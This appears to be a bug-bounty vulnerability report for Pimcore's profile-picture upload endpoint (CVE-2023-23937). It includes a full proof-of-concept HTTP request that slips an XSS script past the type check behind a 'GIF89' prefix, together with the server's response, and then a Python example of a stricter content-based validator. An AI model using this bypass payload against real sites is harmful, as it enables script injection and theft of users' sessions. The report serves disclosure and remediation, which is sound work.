File Upload Type Validation Error in pimcore/pimcore
Reported on
Jan 17th 2023
Description
The upload endpoint used to update the current user's profile picture does not properly validate the content type of the uploaded file. Any authenticated user can bypass the check by prefixing the file with a valid image signature (e.g. GIF89, the start of the GIF89a magic bytes) and sending an arbitrary, otherwise invalid content type. This allows an authenticated attacker to upload HTML files containing JavaScript that is executed in the context of the application's domain.
Proof of Concept
The following request was modified to upload an HTML payload behind a valid GIF signature; the same technique can be used to upload a file of any other content type:
Request
Request captured while updating the profile picture
POST /admin/user/upload-current-user-image?id=2 HTTP/1.1
Host: demo.pimcore.fun
Cookie: pimcore_admin_sid=1; PHPSESSID=f1a6743af0c4aa2f43eb5a30c312c318; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NzM5MzE3NDQuOTQzMzQzLCJwdGciOnsiX20iOjEsIl9jIjoxNjczOTMxNTYxLCJfdSI6MTY3MzkzMTc0NCwidmk6c3J1IjpbN119LCJleHAiOjE2NzM5MzM1NDR9._aLiOrKEnfyCJ7sjp21XNezGvj93gf9OSpkS82KaSnI; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NzM5MzE3NDQuOTQzNDYyLCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6MX0sIl9jIjoxNjczOTMxNTYxLCJfdSI6MTY3MzkzMTU2MX0sImV4cCI6MTcwNTQ2Nzc0NH0.I1O7KjEqpnL2j7xv8NUruiX3EA50KMiVFShELH1WPsE
Content-Length: 366
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://demo.pimcore.fun
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0BPEuMmR4S3FotDc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: https://demo.pimcore.fun/admin/?_dc=1673931742&perspective=
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundary0BPEuMmR4S3FotDc
Content-Disposition: form-data; name="csrfToken"
2e7d721f1227607982deebcfce21c0c204a272b4
------WebKitFormBoundary0BPEuMmR4S3FotDc
Content-Disposition: form-data; name="Filedata"; filename="111.txt"
Content-Type: text/plain
GIF89<script>alert(document.cookie);</script>
------WebKitFormBoundary0BPEuMmR4S3FotDc--
Response
HTTP/1.1 200 OK
Date: Tue, 17 Jan 2023 05:04:54 GMT
Server: Apache/2.4.38 (Debian)
Strict-Transport-Security: max-age=63072000; preload
X-Powered-By: PHP/8.0.10
Cache-Control: max-age=-1358399094, must-revalidate, private
X-Powered-By: pimcore
Content-Language: en
Pragma: no-cache
Expires: Tue, 01 Jan 1980 00:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f1a6743af0c4aa2f43eb5a30c312c318; path=/; secure; HttpOnly; SameSite=strict
Strict-Transport-Security: max-age=63072000; preload
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Referrer-Policy: origin-when-cross-origin
X-Robots-Tag: noindex, noarchive, nosnippet
Connection: close
Content-Length: 16
{"success":true}
Screenshots
https://drive.google.com/drive/folders/1tX3PCbBFaEK6leGL-QcCvlI2cPJ9qCK2?usp=sharing
Impact
This allows an attacker to host custom pages on the application's origin. Those pages can contain phishing HTML or JavaScript that is executed in the context of the active user's browser session.
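The bypass above works because a check that only looks for a known image signature at the start of the file accepts any bytes that follow it. As an added example (not Pimcore's code and not the fix from the advisory), the Python below models that flawed check next to a content-based validator that walks the GIF structure end to end, ignores the client-supplied Content-Type and filename entirely, and derives both the stored extension and the serving headers from what the bytes actually are. The allowlist, the hand-built 1x1 GIF and the simplified PNG check are assumptions made for this example; the PoC body is taken from the request in the report.

```python
import struct

# Detected MIME type -> extension used on disk. Assumed allowlist for this example;
# Pimcore's real allowlist is not shown on the page.
ALLOWED_TYPES = {"image/gif": ".gif", "image/png": ".png"}

# Constructed inputs. POC_BODY is the multipart file body from the report's PoC;
# MINIMAL_GIF is a hand-built 1x1 GIF89a (header, 2-colour table, one image, trailer).
POC_BODY = b"GIF89<script>alert(document.cookie);</script>"
MINIMAL_GIF = bytes.fromhex(
    "474946383961"                         # "GIF89a"
    "0100" "0100" "80" "00" "00"           # width 1, height 1, GCT flag, bg index, aspect
    "000000ffffff"                         # 2-entry global colour table
    "2c00000000010001000002024401003b"     # image descriptor, LZW data, trailer
)


def weak_is_image(data: bytes) -> bool:
    """Models the behaviour the report describes: a known signature prefix is all
    that is required, so "GIF89<script>..." passes as an image."""
    return data[:4] in (b"GIF8", b"\x89PNG")


def _skip_subblocks(data: bytes, pos: int):
    """Advance past a chain of length-prefixed data sub-blocks; None if truncated."""
    while pos < len(data):
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n
    return None


def parse_gif(data: bytes) -> bool:
    """Walk the GIF structure. Accepts only a complete GIF87a/GIF89a stream whose
    trailer (0x3B) is the last byte, so a bare "GIF89" prefix or a real image
    with HTML appended after the trailer is rejected."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return False
    width, height, packed = struct.unpack_from("<HHB", data, 6)
    if width == 0 or height == 0:
        return False
    pos = 13
    if packed & 0x80:                      # global colour table present
        pos += 3 * (2 << (packed & 0x07))
    while pos is not None and pos < len(data):
        introducer = data[pos]
        pos += 1
        if introducer == 0x3B:             # trailer: must end the file
            return pos == len(data)
        if introducer == 0x2C:             # image descriptor: 9 bytes + optional LCT
            if pos + 9 > len(data):
                return False
            ipacked = data[pos + 8]
            pos += 9
            if ipacked & 0x80:
                pos += 3 * (2 << (ipacked & 0x07))
            pos = _skip_subblocks(data, pos + 1)   # +1 skips the LZW minimum code size
        elif introducer == 0x21:           # extension block: label byte, then sub-blocks
            pos = _skip_subblocks(data, pos + 1)
        else:
            return False
    return False


def parse_png(data: bytes) -> bool:
    """Simplified PNG check: the fixed 8-byte signature and an IEND chunk ending the file."""
    return data.startswith(b"\x89PNG\r\n\x1a\n") and data.endswith(b"IEND\xaeB`\x82")


def validate_upload(data: bytes, client_content_type: str, filename: str):
    """Content-based validation. The client's Content-Type and the submitted filename
    are deliberately ignored (they are attacker-controlled); the stored extension comes
    from the detected type. Returns (mime, extension), or None to refuse the upload."""
    if parse_gif(data):
        detected = "image/gif"
    elif parse_png(data):
        detected = "image/png"
    else:
        return None
    if detected not in ALLOWED_TYPES:
        return None
    return detected, ALLOWED_TYPES[detected]


def serve_headers(mime: str) -> dict:
    """Headers for serving a stored upload: the detected type, never the uploaded one,
    plus nosniff so the browser does not second-guess it."""
    return {"Content-Type": mime, "X-Content-Type-Options": "nosniff"}


if __name__ == "__main__":
    print("weak check accepts PoC:", weak_is_image(POC_BODY))                          # True
    print("structural check on PoC:", validate_upload(POC_BODY, "text/plain", "111.txt"))   # None
    print("structural check on real GIF:", validate_upload(MINIMAL_GIF, "text/plain", "111.txt"))
    print("GIF with HTML appended:", validate_upload(MINIMAL_GIF + b"<script>", "image/gif", "a.gif"))
```

Two caveats worth keeping in mind. A structurally valid GIF can still carry HTML text inside a comment extension, so a parser alone does not make an upload safe; what actually prevents script execution is serving the stored file with the detected Content-Type and `X-Content-Type-Options: nosniff` (ideally from a separate origin), not with whatever type the uploader sent. The `nosniff` header visible on the JSON response in the PoC is irrelevant to that, since the headers that matter are the ones on the stored file when it is later fetched, which the report does not show.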
References
@ctflearner CVE is under https://github.com/pimcore/pimcore/security/advisories/GHSA-8xv4-jj4h-qww6
Thank you again
Thanks for your response. @JiaJia Ji, is it possible that this CVE-2023-23937 is reflected in my huntr-dev account by talking to admin?